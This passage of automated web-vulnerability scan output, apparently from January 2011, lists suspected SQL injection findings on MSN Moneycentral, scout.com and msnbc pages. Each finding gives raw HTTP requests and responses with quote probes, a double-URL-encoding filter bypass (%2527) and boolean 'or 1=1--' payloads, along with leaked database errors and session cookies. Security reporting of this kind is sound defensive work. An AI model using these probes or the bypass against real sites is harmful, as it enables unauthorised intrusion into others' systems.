
Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/portfolio-manager/portfolio.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/portfolio-manager%2527/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:58 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/portfolio-manager%2527%2527/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 400 Bad Request
Connection: close
Date: Sun, 30 Jan 2011 18:04:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8

<html><body>Bad Request</body></html>

1.70. http://redacted/investor/portfolio-manager/portfolio.aspx [userCh cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/portfolio-manager/portfolio.aspx

Issue detail

The userCh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userCh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the userCh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/portfolio-manager/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0%2527; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:00 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/portfolio-manager/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0%2527%2527; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 30 Jan 2011 18:04:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
Pragma: no-cache
pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410642&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fredacted%2Fpploggedin.aspx%3FPage%3Dhttp%253A%252F%252Fmoneycentral%252Emsn%252Ecom%252Finvestor%252Fportfolio%252Dmanager%252Fportfolio%252Easpx%26Query%3D&lc=1033&id=229
Content-Length: 443
Content-Type: text/html
Expires: Sun, 30 Jan 2011 18:04:02 GMT
Set-Cookie: lcid%5Fcb=%2D; expires=Mon, 01-Nov-2010 07:00:00 GMT; domain=.redacted; path=/
Set-Cookie: pp%5Fpage=http%3A%2F%2Fmoneycentral%2Emsn%2Ecom%2Finvestor%2Fportfolio%2Dmanager%2Fportfolio%2Easpx; path=/
Set-Cookie: pp%5Frefer=; path=/
Set-Cookie: pp%5Fquery=; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410642&amp;rver=5.5.4177.0&
...[SNIP]...

1.71. http://redacted/money.search [MUID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /money.search

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F'; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:06:02 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F''; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Redirect
Connection: close
Date: Sun, 30 Jan 2011 18:06:02 GMT
Server: Microsoft-IIS/6.0
Location: http://moneycentral.msn.com/common/toobusy.htm


1.72. http://redacted/money.search [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /money.search

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:06:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 21441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<script type="text/javascript">
   if(typeof(top.LogErr)!="undefined")window.onerror=top.LogErr;
</script>
...[SNIP]...

Request 2

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Redirect
Connection: close
Date: Sun, 30 Jan 2011 18:06:26 GMT
Server: Microsoft-IIS/6.0
Location: http://moneycentral.msn.com/common/toobusy.htm


1.73. http://redacted/money.search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /money.search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /money.search?1'=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:06:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /money.search?1''=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Redirect
Connection: close
Date: Sun, 30 Jan 2011 18:06:24 GMT
Server: Microsoft-IIS/6.0
Location: http://moneycentral.msn.com/common/toobusy.htm


1.74. http://recruiting.scout.com/a.z [c parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The c parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the c parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=73&p=9&c=4'&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:52:01 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 308 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:02:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212531

<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null,2011,null,null,null,null,null,88,null'.--><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict
...[SNIP]...

1.75. http://recruiting.scout.com/a.z [pid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=73&p=9&c=4&pid=88'&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:52:12 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 72 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:02:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 11806

<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null'.--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1
...[SNIP]...

1.76. http://recruiting.scout.com/a.z [yr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The yr parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the yr parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011' HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:52:22 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb4
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 100 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:02:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16943

<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null,null,null,null,null,88,null'.--><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

...[SNIP]...

1.77. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 38908709%20or%201%3d1--%20 and 38908709%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?138908709%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:37:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143999

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1916431175&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;58:58:178;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1916431175&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;58:58:178;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrolo
...[SNIP]...

Request 2

GET /?138908709%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:37:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143987

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1849587176&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;58:58:178;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1849587176&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;58:58:178;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrolo
...[SNIP]...

1.78. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010%20and%201%3d1--%20/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=223093804&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=223093804&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
